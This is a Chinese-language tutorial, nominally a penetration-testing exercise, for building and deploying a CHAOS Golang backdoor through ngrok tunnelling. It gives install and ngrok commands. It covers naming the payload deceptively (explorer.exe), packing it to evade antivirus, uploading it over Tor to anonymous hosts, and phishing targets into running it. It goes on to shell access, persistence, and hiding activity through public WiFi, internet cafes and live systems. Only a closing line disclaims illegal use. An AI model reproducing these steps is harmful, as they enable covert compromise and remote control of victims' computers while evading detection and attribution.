用鱼竿、鱼钩、鱼饵和彩蛋模拟一次网络渗透
字数 1673 2025-08-18 11:37:11

网络渗透模拟教学:基于CHAOS后门框架的钓鱼攻击

工具准备

1. 主要工具

  • CHAOS远程后门:基于Golang的开源后门框架
    • GitHub地址:https://github.com/tiagorlampert/CHAOS
  • ngrok:内网穿透工具
    • 官网:https://ngrok.com/
    • 可使用GitHub账号登录注册

2. 辅助工具

  • 匿名网络空间:https://www.upload.ee/
  • 匿名邮箱服务
    • http://www.yopmail.com/
    • https://mytemp.email/
  • 临时电话号码服务
    • https://www.textnow.com/signup
    • 区号查询:https://www.allareacodes.com/area_code_listings_by_state.htm

环境搭建

1. CHAOS后门安装(Kali Linux)

# 安装依赖
apt install golang upx-ucl -y

# 克隆仓库
git clone https://github.com/tiagorlampert/CHAOS.git

# 进入目录
cd CHAOS

# 运行
go run CHAOS.go

2. ngrok配置

  1. 注册ngrok账号并获取authtoken
  2. 在Kali中下载ngrok客户端
  3. 添加authtoken:
    ./ngrok authtoken <your_authtoken>
    
  4. 开启TCP转发:
    ./ngrok tcp 4444
    
    记下分配的外网地址(如0.tcp.ngrok.io:19413

生成后门

  1. 在CHAOS界面选择选项1(生成payload)
  2. 输入ngrok提供的外网IP和端口
  3. 为后门设置具有欺骗性的名称(如explorer.exe
  4. 选择加壳选项(增加免杀能力)

部署后门

  1. 将生成的后门文件通过Tor网络上传到匿名文件共享网站(如upload.ee)
  2. 获取下载链接
  3. 通过钓鱼邮件或其他方式诱导目标下载执行

控制目标

  1. 在CHAOS中启动监听:
    nc -lvp 4444
    
  2. 当目标执行后门后,将获得shell访问权限
  3. 可用命令:
    • 文件上传/下载
    • 打开指定URL
    • 添加启动项实现持久化

免杀特性

  1. CHAOS后门在测试中能绕过360卫士等国内主流杀毒软件
  2. 即使被扫描发现并清除,仍能保持控制权限
  3. 全盘扫描后可能显示无毒,但后门仍在运行

高级技巧

1. Word宏利用

GitHub资源:https://github.com/flagellantX/wordexploit/blob/master/coding

2. 浏览器插件攻击

利用HFS+ngrok构建简易网络服务器,诱导目标访问恶意URL自动下载执行后门
GitHub资源:https://github.com/flagellantX/BrowserKiller.git

3. 多目标控制

  • 为不同目标生成监听不同端口的后门
  • 例如:目标A监听4444端口,目标B监听5555端口

匿名化技巧

  1. 使用Tor浏览器访问敏感服务
  2. 通过公共网络环境操作(无监控的公共WiFi、网吧等)
  3. 使用Live系统(如ParrotSec)避免留下痕迹
  4. 硬盘加密处理

渗透测试环境推荐

  1. 虚拟化平台:
    • VMware:https://www.vmware.com/products/workstation-pro.html
    • VirtualBox:https://www.virtualbox.org/wiki/Downloads
  2. 渗透测试系统:
    • Kali Linux:https://www.kali.org/downloads/
  3. 漏洞测试环境:
    • DVWA/Metasploitable:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
    • bWAPP:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
  4. Windows测试环境:
    • Windows 10下载:https://www.microsoft.com/en-us/software-download/windows10

注意事项

  1. 钓鱼链接应使用URL缩短服务或结合XSS技术进行伪装
  2. 为保持会话,可将Kali系统挂起而非关闭
  3. 法律风险提示:本教学仅用于合法渗透测试和安全研究,未经授权对他人系统进行测试属违法行为
网络渗透模拟教学:基于CHAOS后门框架的钓鱼攻击 工具准备 1. 主要工具 CHAOS远程后门 :基于Golang的开源后门框架 GitHub地址:https://github.com/tiagorlampert/CHAOS ngrok :内网穿透工具 官网:https://ngrok.com/ 可使用GitHub账号登录注册 2. 辅助工具 匿名网络空间 :https://www.upload.ee/ 匿名邮箱服务 : http://www.yopmail.com/ https://mytemp.email/ 临时电话号码服务 : https://www.textnow.com/signup 区号查询:https://www.allareacodes.com/area_ code_ listings_ by_ state.htm 环境搭建 1. CHAOS后门安装(Kali Linux) 2. ngrok配置 注册ngrok账号并获取authtoken 在Kali中下载ngrok客户端 添加authtoken: 开启TCP转发: 记下分配的外网地址(如 0.tcp.ngrok.io:19413 ) 生成后门 在CHAOS界面选择选项1(生成payload) 输入ngrok提供的外网IP和端口 为后门设置具有欺骗性的名称(如 explorer.exe ) 选择加壳选项(增加免杀能力) 部署后门 将生成的后门文件通过Tor网络上传到匿名文件共享网站(如upload.ee) 获取下载链接 通过钓鱼邮件或其他方式诱导目标下载执行 控制目标 在CHAOS中启动监听: 当目标执行后门后,将获得shell访问权限 可用命令: 文件上传/下载 打开指定URL 添加启动项实现持久化 免杀特性 CHAOS后门在测试中能绕过360卫士等国内主流杀毒软件 即使被扫描发现并清除,仍能保持控制权限 全盘扫描后可能显示无毒,但后门仍在运行 高级技巧 1. Word宏利用 GitHub资源:https://github.com/flagellantX/wordexploit/blob/master/coding 2. 浏览器插件攻击 利用HFS+ngrok构建简易网络服务器,诱导目标访问恶意URL自动下载执行后门 GitHub资源:https://github.com/flagellantX/BrowserKiller.git 3. 多目标控制 为不同目标生成监听不同端口的后门 例如:目标A监听4444端口,目标B监听5555端口 匿名化技巧 使用Tor浏览器访问敏感服务 通过公共网络环境操作(无监控的公共WiFi、网吧等) 使用Live系统(如ParrotSec)避免留下痕迹 硬盘加密处理 渗透测试环境推荐 虚拟化平台: VMware:https://www.vmware.com/products/workstation-pro.html VirtualBox:https://www.virtualbox.org/wiki/Downloads 渗透测试系统: Kali Linux:https://www.kali.org/downloads/ 漏洞测试环境: DVWA/Metasploitable:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ bWAPP:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ Windows测试环境: Windows 10下载:https://www.microsoft.com/en-us/software-download/windows10 注意事项 钓鱼链接应使用URL缩短服务或结合XSS技术进行伪装 为保持会话,可将Kali系统挂起而非关闭 法律风险提示:本教学仅用于合法渗透测试和安全研究,未经授权对他人系统进行测试属违法行为